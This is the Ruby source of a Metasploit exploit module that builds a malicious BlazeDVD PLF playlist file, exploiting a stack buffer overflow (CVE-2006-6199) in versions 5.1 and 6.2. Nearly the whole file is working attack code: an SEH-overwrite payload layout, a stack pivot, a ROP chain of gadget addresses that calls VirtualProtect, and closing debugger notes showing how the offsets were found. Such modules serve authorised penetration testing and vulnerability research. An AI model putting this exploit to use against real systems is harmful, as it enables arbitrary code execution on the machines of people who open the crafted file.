modules/exploits/windows/fileformat/blazedvd_plf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When
the application is used to open a specially crafted plf file,
a buffer is overwritten allowing for the execution of arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'MC', # Developed target 5.1
'Deepak Rathore', # ExploitDB PoC
'Spencer McIntyre', # Developed taget 6.2
'Ken Smith' # Developed target 6.2
],
'References' =>
[
[ 'CVE' , '2006-6199' ],
[ 'EDB', '32737' ],
[ 'OSVDB', '30770' ],
[ 'BID', '35918' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'AllowWin32SEH' => true
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00\x0a\x1a",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'BlazeDVD 6.2',
{
'Payload' =>
{
# Stackpivot => add esp,0xfffff254
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
}
}
],
[ 'BlazeDVD 5.1',
{
'Ret' => 0x100101e7,
'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumUpper
}
}
],
],
'Privileged' => false,
'DisclosureDate' => '2009-08-03',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ CRASH_SERVICE_DOWN, ],
'SideEffects' => [ SCREEN_EFFECTS, ],
},
))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
])
end
def rop_chain
# rop chain generated with mona.py - www.corelan.be
case target.name
when 'BlazeDVD 6.2'
rop_gadgets = [ ]
# 0x6162e802 RETN (ROP NOP) [EPG.dll]
rop_gadgets.fill(0x6162e802, 0..7)
rop_gadgets += [
0x61636758, # POP EAX # RETN [EPG.dll]
0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
0x61628ea2, # POP EBP # RETN [EPG.dll]
0x616069a1, # push esp # ret 0x04 [EPG.dll]
0x61626702, # POP EAX # RETN [EPG.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x61627d9c, # NEG EAX # RETN [EPG.dll]
0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]
0x61629938, # POP EAX # RETN [EPG.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x61627d9c, # NEG EAX # RETN [EPG.dll]
0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]
0x61612f5a, # POP ECX # RETN [EPG.dll]
0x100142ab, # &Writable location [SkinScrollBar.Dll]
0x616313ac, # POP EDI # RETN [EPG.dll]
0x6162e588, # RETN (ROP NOP) [EPG.dll]
0x6162d638, # POP EAX # RETN [EPG.dll]
0x90909090, # nop
0x61620831, # PUSHAD # RETN [EPG.dll]
]
end
return rop_gadgets.flatten.pack("V*")
end
def exploit
case target.name
when 'BlazeDVD 5.1'
plf = rand_text_alpha_upper(6024)
plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V')
plf[876,12] = make_nops(12)
plf[888,payload.encoded.length] = payload.encoded
when 'BlazeDVD 6.2'
plf = rand_text_alphanumeric(260)
plf << rop_chain
plf << payload.encoded
end
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(plf)
end
end
=begin
0:000> !exchain
0012f2c8: 31644230
Invalid exception stack at 64423963
0:000> !pattern_offset 6024 0x31644230
[Byakugan] Control of 0x31644230 at offset 872.
0:000> !pattern_offset 6024 0x64423963
[Byakugan] Control of 0x64423963 at offset 868.
0:000> s -b 0x10000000 0x10018000 5e 59 c3
100012cd 5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00 ^Y.V.t$.W..V..<.
100101e7 5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24 ^Y........D$..L$
0:000> u 0x100012cd L3
skinscrollbar!SkinSB_ParentWndProc+0x1fd:
100012cd 5e pop esi
100012ce 59 pop ecx
100012cf c3 ret
=end